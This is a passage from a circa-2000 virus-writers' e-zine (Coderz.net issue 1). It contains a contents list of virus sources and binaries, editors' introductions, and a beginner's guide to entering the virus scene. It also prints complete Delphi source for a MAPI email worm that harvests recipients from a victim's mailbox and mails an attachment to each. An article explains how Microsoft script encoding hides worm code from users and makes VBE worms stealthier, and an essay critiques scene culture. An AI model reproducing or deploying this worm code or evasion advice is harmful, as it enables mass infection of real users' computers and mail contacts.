Вы находитесь на странице: 1из 434

Gigabyte's Introduction

Evul's Introduction

Articles
MAPI Worms in C++ and Delphi HomeSlice
Viral Introduction Gigabyte
Script encoding Zulu
Some politically incorrect words about the so-called "scene" Spanska
Faster Spreading SnakeByte
AV-List SnakeByte
Are Anti-Virus Companies Criminals? SnakeByte
Some Tipz & trix for Win2k Ratter
A few ideas for viruses Kalkin/EViL
The protector scene Kalkin/EViL
Katja Kladnik (Lucky Lady) Richard Karsmakers, contributed by Al Leitch
Anti Avp Vbs I-Worms Detection [K]Alamar
Retro the easy way MidNyte
How to become the world's richest man MidNyte
An Introduction to Encryption, Part III MidNyte

Source Code
ASM
Win32.Infinite Billy Belcebu/IKX
W9x.mATRiX Lifewire/IKX
Dildo T-2000/IR
Tequila Disassembled by T-2000/IR
Bad Seed Disassembled by T-2000/IR
Win95.Yildiz Black Jack
CU.1076 Disassembled by Black Jack
Win.Tentacle_II Disassembled by Black Jack
Win32.DDoS SnakeByte
Win32.CrashOverwrite BeLiAL
One Half Disassembled by Ratter

HLL
Win32.HLLP.Scrambler.b Gigabyte
Win32.HLLP.STD Error/Team Necrosis
Win32.HLLW.Hop_Along Quilb

VBA & VBS


AM97.Lea Knowdeth/Metaphase & NoMercyVirusTeam
WM97.NoBodyHears AngelsKitten/NuKE
NETWORK/OUTLOOK.FakeHoax Zulu
WM97.Neclovek Lys Kovick/Metaphase
WM97.Unperson Lys Kovick/Metaphase
HTML.MSBound Suppa
WM97.LSD WalruS
WM97/2K.Aida e[ax]
WM97/2K.String e[ax]
WM97/2K.String2 e[ax]
WM97/2K.Blade Necronomikon
WM97/Lithium jackie
XM97/Fireal jackie

Batch
HighHopes.c Knowdeth/Metaphase & NoMercyVirusTeam
Fuck That 1.0a Deloss/NuKE

Binaries

Win32.Infinite Billy Belcebu/IKX


IRoK v1.1c Raid/SLAM
Win32.HLLP.Scrambler.b Gigabyte
I-Worm.Scooter Gigabyte
Dildo T-2000/IR
NETWORK/OUTLOOK.FakeHoax Zulu
Win32.HLLP.Adrenaline Anonymous
Win95.Yildiz Black Jack
Showdown GzR/NuKE
Prophecy GzR/NuKE
Win32.CrashOverwrite BeLiAL
Win32.HLLP.STD Error/Team Necrosis
Knowdeth/Metaphase & NoMercyVirusTeam
WordMacro.Blur.a
and AngelsKitten/NuKE
Interviews
Real Time Interview with Rajaat
Interview with Raid/SLAM, about Irok
Interview with The Unforgiven
Interview with Del Armg0/MATRiX
VX meeting 2000 in Czech Republic: Opinions of a few VXers

Tools
E-Z Disassembler & Dumper 1.0 GzR/NuKE
Word97 VBA SR1 Generator ver 1.1k Knowdeth/Metaphase & NoMercyVirusTeam

Humor
Kevin & Kell Bill Holbrook, contributed by SnakeMan
The case of the stupid IRCop Raid
Gigabyte's Introduction

Hey there..

What is this e-zine? Well, it's mainly an oversight of what's been going on in and around the VX scene the last year.
The zine is completely contribution based, as this zine is made by Coderz.net, which isn't a group. I've seen Coderz.net
grow from a fairly small website (being Evul's own homepage) to what it is now: A virus information site, hosting
several (yeah, okay, shitloads) VX homepages. Maybe this is a moment to say, thanks Evul, for the time and effort
you put into Coderz.net.
Thanks also goes to:

Rajaat, Raid and The Unforgiven: For taking the time to answer the interview questions, Rajaat even in real life
(writing the answers down in his hard to read kinda handwriting :)
GriYo, Benny, mort and Ratter: For answering the questions about the meeting.. and for the great time at the meeting
itself of course :)
Roadkil: For HTML help.. and for testing my sunglasses with green and yellow letters on IRC :P
EXE-Gency and Del Armg0: For contributing another interview.
Everyone else who has contributed viruses, articles, etc.: This zine wouldn't be possible without you.

Greets:

Evul: Keep your dirty socks away from #virus! :)


Spyda: /me bites you :P
Queen: Males.. nothing but trouble, right?
Raid: How about we all smoke some weed and burn infected users with the hot ashes, hmm? :)
Darkman: Walking sex encyclopedia
Benny: Lying down on a used condom is not a good idea.. no, not even at a VX meeting! Unless you're called Benny..
Jackie Twoflower: Lz0#2 is nice :)
Rajaat: I still hate qwerty keyboards
T-2000: Fries and beer!
Vecna: Still can't dance?
Mandragore: Cheeseburgers :)
Several other people in the scene.. I won't fill a whole zine with just this list :)

Fuck you:

Virus-X (aka Trevelyan or Frieza)


Rhape79
Nala
The Bughunter (aka CWarrior)
Graham Cluley: You damn sexist
Evul's Introduction

Welcome to Coderz.Net zine issue 1.


After long delay, and lots of procrastination, here it is - humble as it may be. This zine is made up of submissions from
many members of the VX scene, and edited in whole, by Gigabyte. We hope you enjoy this zine and coderz.net - and
if all goes well, hopefully there will be an issue #2.
Coderz.Net was never meant to be what it has become - it simply happened. It started out as a simple homepage, and
then a few sites were added, and from there it grew enormously. Over the last year it has been running on the average
80 websites, and taking traffic at rates of over 1.5 million page hits per month at times. I have done my best to make
sure that the site is functional for users, and that the site stays up to date, however this has become quite a job lately,
due to the size and demand of site. Along with the normal troubles that come with such a site, Coderz has been
through major technical problems, threatened, harrassed, attacked, and run out of ISPs by the anger resulting from
isolated incidents - yet at over two years of age, its still here and doing fine.
The idea of starting a zine was kicked around for a while by myself, and I decided not to, for lack of time and patience
to do so myself. A few months later, Gigabyte came to me about doing a zine for coderz, and after lots of
ideas/debating she decided to take on the job and put together a zine herself .. great job, Gigs.
Back to the workload talked about earlier, we desperately need people willing to dedicate some time to helping with
Coderz, so both the site and the zine may continue to grow and improve. Anyone who is interested in helping, we
would be happy to hear from you. Email me at evul@coderz.net if you would want to contribute. As part of the "live
and learn" process involved in getting this zine out to you, we decided that if there is to be a #2, we will definately
need people to help with it. Contact Gigabyte (Gigabyte@coderz.net) about the zine.
Once again, many thanks to gigabyte for the hard work on this zine, and we appologise for the extended wait for this
release.
Well, enough of my ramblings, go read the damn zine already!
Best Regards,
John

evul@coderz.net
program mapiworm;
uses
Windows, MAPI;
{$R *.RES}

(************** MAPI Worms in C++ and Delphi *********************

I haven't seen much documentation on writing a worm via Win32 HLL's


so here goes. Nothing revolutionary, just simple API calls.
This article is mainly aimed at the beginner, since actually researching
this shit by hand is a major pain in the ass and time-consuming.

I'm showing the code in Delphi cause it's a bit easier to read
and looks nicer than C++. Code can easily be converted to C in
about thirty minutes, see Microsoft's MSDN section for a complete
MAPI C++ example for the syntax. A ton of code can be snipped before
inserting into your personal worm. I figure showing it in "long form"
to be nice etiquette for an article-specific program.

This code was tested on NT 4.0, but might need a revision dependent
upon your OS and how MAPI is setup. And before you laugh at 20k for
just the worm engine, I checked AVP's site for MAPI and found some
very large filesize worms doing moderately well in the wild:

I-Worm.PrettyPark: http://www.avp.ch/avpve/NewExe/win32/ppark.stm
I-Worm.ZippedFiles: http://www.avp.ch/avpve/worms/zipped.stm
I-Worm.WinExt: http://www.avp.ch/avpve/worms/WINEXT.stm
I-Worm.Plage: http://www.avp.ch/avpve/worms/Plage.stm

Couple of useful links:

Info on MAPI hook provider


http://support.microsoft.com/support/kb/articles/Q224/3/62.ASP

MAPI Address example


http://support.microsoft.com/support/kb/articles/Q126/6/58.asp

ReadMail example
http://support.microsoft.com/support/kb/articles/Q140/3/37.asp
*)

// Usage: HKEY_CURRENT_USER, 'Software\ImaFaggot', 'GayLesbian'


function regReadString(kRoot: HKEY; sKey, sValue: String): String;
var
qValue: array[0..1023] of Char;
DataSize: Integer;
CurrentKey: HKEY;
begin
RegOpenKeyEx(kRoot, PChar(sKey), 0, KEY_ALL_ACCESS, CurrentKey);
Datasize := 1023;
// RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, nil, @DataSize);
RegQueryValueEx(CurrentKey, PChar(sValue), nil, nil, @qValue[0], @DataSize);
RegCloseKey(CurrentKey);
Result := String(qValue);
end;

var
MAPIMessage: TMAPIMessage;
lppMapiMessage: PMapiMessage;
Recip, inRecip: TMapiRecipDesc;
msgFile: TMapiFileDesc;
MError: Cardinal;
MapiSession, iMinusOne, i: LongInt;
bWinNT, bFindFirst: Boolean;
ProfileName, sAddress, sProfile, sSentMail: String;
sSeedMessageID, sMessageID: array[0..512] of Char;
os: TOSVersionInfo;
begin
// Which Operating System we on?
os.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
GetVersionEx(os);
bWinNT := (os.dwPlatformId = VER_PLATFORM_WIN32_NT);
// Grab default profilename from registry
if (bWinNT) then
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles',
'DefaultProfile')
else
// Standard Windows
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows Messaging Subsystem\Profiles', 'DefaultProfile');

// Fucking Delphi bug won't allow a -1 to be set


// within the structure, so we trick it
iMinusOne := -1;
// Will hold any previous recipients
sSentMail := '';

// Logon to MAPI. If no workie, get outta here


try
MError := MapiLogOn(0, PChar(ProfileName), nil, MAPI_NEW_SESSION, 0, @MapiSession);
if (MError <> SUCCESS_SUCCESS) then
Exit;
except
;
end;

// Fill in the file structure with our attachment


with msgFile do
begin
ulReserved := 0;
flFlags := 0;
nPosition := iMinusOne; // Let Outlook handle the file position
// Obviously, replace the INI with your worm's path/filename
lpszPathName := PChar('c:\windows\system.ini');
lpszFileName := nil;
lpFileType := nil;
end;

bFindFirst := True;

// Walk through first fifty messages


for i := 1 to 50 do
try
// Keep up with our MessageID
if (bFindFirst) then
begin
sSeedMessageID := '';
bFindFirst := False;
end
else
sSeedMessageID := sMessageID;

// Find a message
// MapiFindNext serves as both a "findfirst/findnext" function, dependent
// upon if MessageSeed has a value
MError := MapiFindNext(MapiSession, 0, nil, @sSeedMessageID, 0, 0, @sMessageID);
if (MError = SUCCESS_SUCCESS) then
begin
// Obtain the long pointer
lppMapiMessage := @MAPIMessage;
// Open for Reading, headers only (both faster, and avoids
// writing all the god damned attachments to temp directory)
MError := MAPIReadMail(MAPISession, 0, @sMessageID,
MAPI_ENVELOPE_ONLY, 0, lppMapiMessage);
if (MError = SUCCESS_SUCCESS) and (lppMapiMessage.lpRecips <> nil) then
begin

// Sets info about message recipient


with Recip do
begin
ulReserved := 0;
ulRecipClass := MAPI_TO;
sAddress := 'SMTP:' + lppMapiMessage.lpRecips.lpszAddress;
lpszAddress := Pchar(sAddress);
lpszName := lppMapiMessage.lpRecips.lpszName;
ulEIDSize := 0;
lpEntryID := nil;
end;

// Clear out to avoid any leftover setting


FillChar(MAPIMessage, SizeOf(MAPIMessage), 0);
// Fill the MapiMessage structure.
// Unnecessary to expand entire struct, but aesthetically pleasing
with MapiMessage do
begin
ulReserved := 0;
lpszSubject := PChar('Insert subject for message');
lpszNoteText := PChar('Message text goes here');
lpszMessageType := nil;
lpszDateReceived := nil;
lpszConversationID := nil;
flFlags := 0;
lpOriginator := nil;
nRecipCount := 1;
lpRecips := @Recip;
nFileCount := 1;
lpFiles := @msgFile;
end;

// Send the message


if (Pos(lppMapiMessage.lpRecips.lpszAddress, sSentMail) = 0) then
begin
MError := MapiSendMail(MapiSession, {handle}0, MapiMessage, 0, 0);
// Store this address, so no duplicate messages are sent
sSentMail := sSentMail + lppMapiMessage.lpRecips.lpszAddress;
end;
end;
end;
except
; // Process your errors like a man
end;
try
MError := MapiLogOff(MapiSession, 0, 0, 0);
except
;
end;
end.
Gigabyte

Explanation of some words.

Before I start, I will explain some words. You will probably not only see these words in Viral Introduction, you might
see them in the rest of the zine as well.

VX: Virus eXchanging. VXers are those who are pro-virus, collect viruses, write them, exchange them..

AV: Anti Virus. They make virus scanners. Examples are: Anti Viral Toolkit Pro, Norton Antivirus, McAfee...

IRC: Internet Relay Chat. People use it to chat, to communicate. There are many different IRC servers, Undernet for
example.

IRC client: What people use to connect to an IRC server. Examples are: mIRC, PIRCH, Xircon, VIRC..

ASM: Assembly language. This language is most used to code viruses in.

TASM: Turbo Assembler. This is most used in the VX scene to assemble ASM source code into executable files.
(Requires TLINK)

VBA: Visual Basic for Applications. It's a part of the Microsoft Office products.

VBS: Visual Basic Scripting language. Can be inside an HTML page. (for more information see the part about script
viruses in "What is:", further down in this document.

Where to find information about viruses and collecting?

Well, I think I should give you some links to virus sites to begin with. Your first stop for finding any VX site should
be coderz.net. Check the "Hosted pages" part, you'll find many interesting sites on coderz.net, and they might contain
other links to VX sites elsewhere.

Coderz.net
29A
#virus Homepage
Virus Trading Center
Tally's Virus Link Reference

If you're looking for IRC channels about viruses, you could come to #vir and #virus on Undernet. Watch out: NEVER
ask or beg for viruses, you'll get kicked out. And DON'T TURN THE CAPS LOCK ON LIKE THIS, it's annoying,
and it looks like you're yelling all the time, or you'll get kicked out. Viruses can be found on the net, if you put in a bit
of effort. If you can’t be bothered, or haven’t got the intelligence to find even a few, then you’re not likely to be helped
out. People in the scene will gladly help you out if you put in the effort first to prove you’re not just going to infect
someone’s computer. They need to know you’re interested in learning.

In which language are viruses written?

Mainly in Assembler (ASM), but there are also macro-viruses, which are made in Visual Basic for Applications
(VBA). VBA is a part of the Microsoft Office products. There are viruses that are written in other languages, but
they're a rarity. Newer is VBS, a scripting language that can be used for making worms or viruses.

How to learn how to write viruses?

If you wanna learn how to write viruses, you might want to read a tutorial. There are some tutorials in VDAT, for
example. VDAT contains a lot of information about viruses, VXers, VX groups and also tutorials about how to write
viruses. You can find answers on all kind of virus-related questions in VDAT, you can find some VX history, etc. One
warning about VDAT though: it’s currently nearly 10Mb and can take a long time to download. It is definitely worth it
though. Also, yes it is an exe, yes it is made by someone interested in viruses, but NO, it is not a trojan as I have been
asked before. If you were going to write a trojan, would you make it 10Mb? I guess you’ll have to trust me on that :)

Download VDAT from:

Coderz.net's FTP

And also the Codebreakers magazines are good.

Get them from:

Codebreakers

or

Coderz.net's FTP

(Most of their tutorials can be found in VDAT)

Don't be discouraged when you start out coding, once you get the hang of the simple parts you can go at your own
pace with the rest.

For which words to search when looking for viruses or information about viruses?

Search for: virus, viruses, virii, VX, computervirus The best search engine to use is http://www.hotbot.com for an
exact match. This can be useful when URL's of virus sites I gave you are down.

How to get into the VX scene?

You can meet VXers on IRC. Try #vir and #virus on Undernet. Read some tutorials (see "How to learn how to code
viruses?"). Have some patience. You have to get to know the people and they have to get to know you. And learning
how to code viruses might also take some time. If you have questions, first look if you can find the answer in VDAT
before asking. Start with the first tutorial, not with the last. Don't go to the next until you've finished.

Is it illegal?

That depends on the country you live in. Usually writing viruses isn't illegal, exchanging isn't illegal either, but
spreading is. So if you send someone a virus without informing the person that it's a virus, that would be considered
spreading. Always check your country’s laws before doing anything virus-related. Governments don’t generally
understand you can be interested in a virus without needing to spread it, if you have a virus they assume you intend to
spread it.

Why do people write viruses?

There can be many reasons: challenge, fame, buck authority, they want to do something different..

What is:

an overwriter: A virus that completly overwrites files to infect them, so it doesn't save the original file. This is what
you start with when you learn to code viruses. The host file is completely destroyed so the virus is noticed almost
immediately. Have a look at Codebreakers magazine #1, or SLAM magazine #2.

an appender: A virus that saves the parts of the infected file that are changed, then writes itself to the end of the host
program. At the end of the virus is some code to restore the program (in memory only) and run it. Because the host
program still works, your virus has a better chance of going un-noticed than an overwriter. This is explained in
Codebreakers magazine #2 or SLAM magazine #3.

a prepender: - A prepending virus will write itself to the start of a program instead of the end. This has the advantage
of not requiring a calculation called the ‘delta offset’. Don’t worry about this yet, the tutorials will explain it when you
get there, I just mention it so you know that there is a difference between a prepender and an appender.

encryption: - Encryption is a way to hide the true function of your virus code, and any messages contained in it. An
encrypted virus has a decyptor at the start that decrypts the rest of it then passes control to the now unencrypted part.

polymorphism: A virus that creates a completely different decryptor every time, to avoid the AV being able to make a
scan-string for the virus.

TSR: - A virus that stays resident in memory. This can be particularly effective, because any program even listed in a
‘DIR’ command can be infected by a TSR virus.

bootsector: - A bootsector is the part of the disk that is read automatically when the computer starts and loads the
operating system. A virus that infects here can load before the operating system, and therefor before any AV program
can be installed in memory.

a macro-virus: Infects MS Office documents, is written in VBA. An example is the Melissa virus.

a script virus: A virus made in Java script or VBS. Those languages can be used inside an HTML page, so the virus
can be inside the HTML page. That's why they're sometimes called HTML viruses. VBS is also called 'Winscript'.
Scripting languages are also good to make worms in. An example is Bubbleboy.

How to get recognized?

Have patience.. I hope, after you have read Viral Introduction, you've found the information you were looking for,
know where to look for tutorials and virus sites and that you know what the VX scene is.

Good luck,

Gigabyte

Thanks a lot to MidNyte, for all the help with the article and suggestions, and to Spyda for the 'Viral Introduction'
picture.
Script encoding
09/09/2000

Hi all.

First, when reading this, consider that English is not my native language, so expect some mistakes in the text. :)

I was going to submit my last worm for the zine, but well, instead of that I decided to write some things about
encoded scripts (JScript/VBScript) and only use that worm as an example. With this I mean Microsoft's encoding,
not other manual ways of encoding or making your code harder to read.
So this is my first article for a zine, most of my viruses/worms where included in many, but just that, not real articles
or tutorials.

Script encoding in HTML files

Script encoding started with Internet Explorer 5, in that time it was possible to use the "<script>" tag of HTML files
to write scripts in JavaScript, JScript or VBScript, but this version added new values for the "language" property of
that tag, those values were "JScript.Encode" and "VBScript.Encode".
Examples:

<script language="JScript.Encode">

<script language="VBScript.Encode">

I said that Internet Explorer 5 started this because it included version 5 of both JScript and VBScript, which are the
ones that included this new feature.

For encoding your script you need Script Encoder which is available from http://msdn.microsoft.com/scripting. This
Win32 command line program will read your HTML file with a script tag having "VBScript" as it's "language" value
and it will write a new HTML file with your code encoded and with the "language" attribute changed to
"VBScript.Encode". Similar thing happens when using JScript.
For example, something like this:

<script language="VBScript">
MsgBox "Example"
</script>

Will be changed to:

<script
language="VBScript.Encode">#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@</script>

Have in mind that this encoding is really designed for casual readers of your code, the truth is that it's trivial and will
not protect your code from people that is decided to view it.

Of course that this things are only supported in Internet Explorer, not in other browsers. Script languages are not
part of the HTML language, not even the "language" attribute is part of HTML 4, the correct attribute would be
"type", but well, that is another matter that is not virus related.

At the time of writing this I know only one virus using this feature in HTML files, it is HTML.Lanus which I wrote time
ago. Anyway, I explained script encoding in HTML files to show how it was possible, but as we know, HTML files
are not a real target for viruses since scripting in them needs authorization from the user when using most needed
objects unless we are using some kind of bug to skip the warning message.

Script encoding in Windows Script Host

Windows Scripting Host 1 (also known as WSH in this text) was included for the first time in Windows 98. It
supported JS (JScript) and VBS (VBScript) files to do scripting, and with this, a new type of viruses was started by
Lord Natas. No encoding was possible.

Time later Windows Scripting Host changed it's name to Windows Script Host and version 2 was out. One of the
things that this new version added was the possibility of encoding our scripts like it was possible with HTML files by
using two new extensions, JSE and VBE.
JSE are JS files after using the encoder, the same happens with VBE and VBS.

For using the encoder with JS and VBS files is the same as with HTML files, it reads a VBS file with our script and it
creates a VBE file which has our encoded script.

NETWORK/OUTLOOK.FakeHoax

NETWORK/OUTLOOK.FakeHoax is an example of script encoding in Windows Script Host. It is the first virus/worm
using the JSE and VBE extension (at least not as auxiliary files), so it has two versions, one in JScript and other in
VBScript.

It uses OUTLOOK and the network shares for spreading. The main code is a COM object written in XML and
VBScript using Windows Script Component, so the code in the JSE and VBE file is trivial. Both versions create a
WSC file (the COM object defined in XML) and then both call methods and change properties of that object, no real
spreading code is in those files.

The worm was written in this way to make it easier to port it to any other language, this way I was able of creating a
JSE and a VBE file without really porting the main code. Also, it's possible to create new versions using Delphi,
Visual C++, or any other by using "REGSVR32.EXE" to register the WSC file as a COM object before calling it's
methods or changing it's properties.

This worm was written to show how JSE and VBE files could be used in viruses/worms, since before this they
where only used as auxiliary files (some versions of HTML.rahC by 1nternal and OUTLOOK.Monopoly by me for
example). Besides, since it needs Windows Script Host 2 or later, it won't be good spreading itself at the time of
writing this.

Also, this was a good opportunity for using Windows Script Component for the first time because it made possible
to write a JScript and a VBScript version without needing to port the whole code, so this is also the first virus/worm
using it's own COM object.

NETWORK/OUTLOOK.FakeHoax text file including source code: network_outlook.fakehoax.txt.


NETWORK/OUTLOOK.FakeHoax ZIP file (text file and working copies of the worm): network_outlook.fakehoax.zip.

Script encoding support

When writing viruses you must know in which systems your code will work. Even that script encoding is not new, it
was not a valid feature for viruses since not many systems supported it. But this is changing in this days and
encoding is now possible for a worm with good spreading capabilities.

Script encoding in HTML files: supported in any system with JScript/VBScript 5+ (included in Internet Explorer 5+).
JSE and VBE files: supported in any system with Windows Script Host 2+ (included in Windows 98 SE, Windows
2000 and Windows Me).

Also, JScript/VBScript 5+ and Windows Script Host 2+ can be installed as separate packages. For example, an
encoded script in a HTML file could be run in Internet Explorer 4 if JScript/VBScript 5+ separate package is
installed.

Trick to run JSE and VBE files in systems with WSH version 1

By using a trick I found, JSE and VBE files can be run in systems with WSH version 1 instead of version 2 if
JScript/VBScript 5+ is installed.

Let's see an example, a system has Windows 98 (not Windows 98 SE) and Internet Explorer 5 installed. WSH 2+
separate package was not installed.
So this system has WSH 1 and JScript/VBScript 5, since WSH 1 was included with that Windows version (unless it
was not selected in a custom installation) and JScript/VBScript 5 was included with Internet Explorer 5.
This system is able to understand encoded scripts, it just doesn't has the JSE and VBE extension support. So to
run a JSE or VBE file we can create a WSH file that calls the encoded script.

This means that instead of running a VBE file directly (not possible in the example), we can run a WSH file (which
is supported in WSH 1) that runs a VBE file.

This method was used in OUTLOOK.Monopoly, the worm was a VBS file that created a WSH and a VBE file and
then runs the WSH file, so the main code was encoded and it worked in the first edition of Windows 98 with Internet
Explorer 5 installed. WSH 2+ was not needed in this worm.

I won't explain how WSH files work, to know more about them, create a JS file and then view it's properties,
changing some of them will create a WSH file in that same directory. Then view it and play with those values. :)

Other file types in which script encoding may be used

Script encoding can be used in any file format that accepts the "<script>" tag. Anyway some file formats like WSC
and WSF are not supported by the actual version of Script Encoder, but you can include encoding in those file
types by creating the "<script>" tag in a HTML file and then copying the encoded code to the WSC or WSF file.
Script Encoder recognized extensions are ASA, ASP, CDX, HTM, HTML, JS, SCT and VBS.

Script encoding and viruses

You can use this feature in HTML viruses/worms even that they are not something very interesting, or you may use
it in worms in JSE or VBE format, which will be better methods.

Normal viruses in JSE and VBE format are not interesting since it would be like JS and VBS viruses, there are not
many files to infect since they are not used much by people, well, maybe you can find lot's of them in my computer
since I'm so crazy about scripting and I use it for lot's of simple tasks, but most users don't use WSH. :)
Also, encoding won't make a file simple to infect, since it would be necessary to decode it, infect it and then encode
it again.

This days there are a lot of worms in VBS files (not happening the same with JScript ones), well, all this worms
could be easily encoded.

Encoding VBS files will have two advantages:


1) The code will be encoded, so it will be harder to read and most users won't do that.
2) VBS files are a known target for worms, but VBE files are not. So VBE extension is far better for them.

But there are also two disadvantages:

1) Some old systems may not be able of running VBE files.


2) The script will be a few bytes bigger. But they are only a few so this is not really a big disadvantage.

Well, that's all, let me know in case of any error you find about technical things or for any question you have.
Bye all.

Zulu
zulu_vx@techie.com
http://coderz.net/zulu
Some politically incorrect words about the so-called "scene"

[by Spanska, written for Coderz.net e-zine]

- Ethnographic introduction

Virus writers and all people classified globally under the "Vx" label are an interesting
population to observe. Especially if you can have a look from the inside, and, at the
same time, if you're not involved enough, in order to be able to see the "scene" from an
independant and exterior point of view. I think i qualify here. I'm around since a few
years, met some coders in real life, wrote some viruses, but at the same time i was never
member of any group, i'm old enough to be able, i hope, to think with some distance,
and these last monthes i basically had better things to do than to write code.

- Don't ask "How much time you spend on IRC?", but ask "Show me your code!"

The main problem of the "scene" can be spelled in three letters: IRC. I'm impressed to
see how people spend so much time chatting about everything except virus coding
techniques. They think that to be a real virus writer, you need to be accepted in some
virus channel, and then spend twelve hours a day there. High dosis of IRC induces a
sort of twist in reality perception, because people behave there very differently from real
life. How many people we saw, and we will see, very proud of their brand new op,
kicking, banning, laughing about infected users, acting as some powerful agressive elite.
Even if they never produced one single line of code. Even if they never did anything
useful for the Vx community. Even if their only production is a twenty line macro-virus.
Even if they have to go to school the day after, where they will not be "DarkLordz" or
"KillerGod" anymore, but normal average teens who have to do their homework. If you
think you're a mature person, and i guess most of us are, behave as a mature person
even on IRC.

You may think i exagerate when i talk about this twist of reality. Unfortunately, i can
cite lots of examples. Let's take one that everybody heard about. This coder, no need to
tell his nickname, according to his own words, sent logs to some anti-virus people
showing that another coder was actively spreading viruses, to "protect one or two
channels from being deleted by Undernet". Basically, that means that the existence of
IRC channels is more important that a real person's life. Because, unfortunately,
nowadays, spreading viruses can lead directly to some years in jail, depending on the
laws in your country. Which means a destroyed life. Just to "save a channel". You see
the twist. I'm pretty sure now the guy in question recognizes the big error he made, and
i hope he learnt from that, but anyway, it's too late.

This example was of course a bit unique in his importance. But it's typical of a state of
mind very widespread in the Vx community. People think an op is the most important
thing in life. They thing their rank level in the channel's bot is the only important thing,
proportional to their eliteness. Twist again. Importantly, this changes the
communication and the behaviour between people. Who is going to criticize the owners
of their favourite channels? Or more generally, people with a higher level? This leads to
hypocrisy, which is very widespread in the community.

I saw too much examples of guys and girls spending so much time on IRC that
everything that happened there, even the most anecdotical fights, was taking a huge
importance. Let me tell you: if you need a computer and to be connected to feel human
emotions like pain, angryness, friendship or love, there is something wrong. Really.

IRC has another problem. It's dangerous. It seems that Vx people never learnt the
lessons from the Melissa case. They don't care about encryption, they don't care about
remailers, they don't care what they say on-line can be used to profile or trace
themselves or, even more importantly, some of their friends. They keep megabytes of
sensitive IRC logs and old mails. They just don't care until the worst happens. Virus
writing and spreading is no more a funny game. It's a dangerous criminal activity, and
you have to take this fact in account, especially if you spread your viruses, or have
friends who do that. This is the main revolution in Vx Land these recent years. Now
they are seriously after us. And nobody cares.

- Vxers as crickets

Let's talk about another interesting behaviour in the Vx scene: the flocking in groups.
That's funny how people who repeat so often that they are independant, or think
different, do all their possible to integrate or create some clan with similar people, and
then be proudly tagged as a member of a larger entity known as a Vx group, with its
own set of new rules and laws they have to conform to. Like sheeps. The analogy is not
here just as a cheap provocation. It's a very old animal behaviour. Individuals are weak;
if they flock, they are stronger against all possible ennemies. Or at least they feel
stronger. Crickets are a good example. Whenever they form a very large group, their
behaviour changes completely and they become much more agressive. They are no more
afraid of predators. It's very funny to see the same kind of basical animal regression in
Vx crowds.

Or maybe it's just to get some form of reconnaissance. People with no skill, or people
afraid to learn (because we were all lamers at day zero, we should not forget that) know
that they will never be accepted in the community for their own merits. So they need a
sort of official tag to prove to others and maybe even more to themselves that they are
part of Vx scene. This mark is provided by the membership in some group, which
provide easily and quickly an official entrance ticket into the scene. No need to produce
anything useful, now. You are already inside the community, even by a totally artificial
way.

Here again, examples are numerous. Was it one year ago that a new mainly english-
based group appeared, totally over-hyped, with every newcomer wanting to integrate?
They did nothing, most of their members were just plain unknown, but you couldn't
miss their presence on IRC. Everybody laughed at them, but nobody told them directly
that they were totally ridiculous, for example with their "public relation department"
(more on that later), and other really laughable things. Yet, again, IRC was the main
"scene" participation. Where is the code? I think now this group returned to the dust it
appeared from, but who really cares? I remember too these ridiculous but finally
rewarded ass-licking efforts by a coder (who is a cool and very intelligent guy, but
anyway) to integrate a high-profile group. Once he was at last able to glue this well-
known tag to his nickname, he reached his goal, and just disappeared. He never coded
anything else.

People sometimes tell me: "being member of a group is a good way to motivate". If you
need to be motivated or gently forced to be a vxer, it should be a better idea to spend
your time fishing, or doing something you don't need to be motivated for. Forget for a
moment the question "how to be a vxer" (and basically, if you still don't know the
answer, it's time to return to your stamp collection), but ask yourself the more important
question: why do you want to be a Vxer? For the hype? Because it's cool? Because
people will fear you? Because you want to satisfy your ego? Because your want to
impress your girlfriend or your mom? Because you're looking for on-line friends? Or
just because you are curious, you want to code and learn some new knowledge?

- I'm soooo afraid to talk with normal people!

Another strong critic and clear sign of immaturity that comes to mind. Most of the Vxer
are not able to argument with people from the two other sides of the virus triangle: anti-
virus people and infected users. There is a good place for that: alt.comp.virus on Usenet.
A mainly anti-virus group nowadays, unfortunately, with some non-interesting parrots,
but anyway, the only place where you can directly and publically discuss with members
of the anti-virus industry. They have their share of big hypocrisy, ego, closed mind, of
course, but i'm not talking about them right now. These guys, and some of them are
very smart, have a lot of tough arguments to oppose to us. The easy way, used by most
of Vx people, is not to participate in this group, and avoid any kind of discussion. Or
just to pop up here once, insult everybody, and jump back to their hole. What does it
mean? Easy: virus writers are not enough open-minded to quietly discuss with people
opposing them, listen and contradict some opposite argumentation. Or maybe they are
not smart and mature enough to engage in an adult discussion. It is kind of funny
because Vx often ask for people to be open-minded about virus writing activities.
Instead of bashing the largely beloved Nick Fitzgerald on IRC, where he is not, what
about trying to argue against him publically in the newsgroup? Of course, it may be a
bit tougher, due to his rhetorical skills.

Some vx people told me that they don't participate in this forum because it's a mainly
AV group. Think a bit more about this argumentation. It's kind of recursive, a bit like
an infinite loop, to use coding terms. It looks like an auto-realizing prophecy. In other
words, it's plain stupid.

- Ego scene

I could talk more about the grossly over-inflated ego of most of us (me included), but
my hour of reflexion is over. Anyway, just as an example, i always find funny the
dramatic and emphatic farewells from people leaving the "scene", although they
generally never produced anything noticeable, texts apparently always written with
some emotion. If you want to leave, just disappear silently and return to where you
came from, nobody will notice anyway, keep contacts if you want, and don't bother
people with your ridiculous tears in the eyes and other "official" retirement. The day
you decided to become a vxer, you didn't issue a public statement "People, listen to me,
today i officially join the vx scene!". So, do the same when you leave. Every other way
to stop is just a desesperate and childish call for attention, from people who didn't
receive enough of it for their production during their career, an ultimate try to turn
people eyes in their direction for one or two minutes. This impression is even worsened
when the guy gives, as a reason, "there is too much shit in the scene these days", or
something like that. That clearly means that they were not here to code and to learn.
They probably needed to be accepted in whatever community to find some other people
to talk with. What about the Barbie doll collector scene? Now i think about it, the
utimate case of lameness is the guy who declares everywhere that he quits, and is
actually still around. Not even able to follow his own words.

Another example, linked with the group problem. It seems that some people create a
group for the only excitement to become a boss, to be able to recruit people, command
them, and fire them if needed. People always need to find other people even more lame
than them to enhance themselves, it's an eternal law of the human beings. Same
mechanism of false and artificial feeling of power than in IRC. It's "my" group, "my"
board, "my" zine, "my" channel, and there i am the king. More generally, a rigid
hierarchy in a group is a clear signal of lameness. Newcomers, please notice how the
